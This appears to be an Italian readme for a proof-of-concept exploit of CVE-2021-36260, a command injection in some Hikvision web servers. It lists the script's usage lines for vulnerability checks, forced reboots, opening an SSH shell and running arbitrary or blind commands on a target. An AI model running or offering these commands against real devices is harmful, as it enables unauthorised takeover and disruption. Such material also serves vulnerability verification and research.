
CVE-2021-36260 POC vulnerabilità di command injection nel web server di alcuni prodotti Hikvision. A causa della validazione dell'input insufficiente, un attaccante può sfruttare la vulnerabilità per lanciare un attacco di command injection inviando alcuni messaggi con comandi malevoli.
Titolo Exploit: Hikvision Web Server Build 210702 - Iniezione di Comandi
Autore Exploit: bashis -- errori aggiornati da shubtheone
Homepage del fornitore: https://www.hikvision.com/
Versione: 1.0
CVE: CVE-2021-36260
Riferimento: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Nota:
[Esempi] Controllo vulnerabilità/verifica sicuro: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Controllo vulnerabilità/verifica sicuro e non sicuro: (userà 'unsafe check' solo se non verificato con 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Controllo vulnerabilità/verifica non sicuro: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Avvia e connettiti alla shell SSH: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Esegui comando: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Esegui comando blind: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"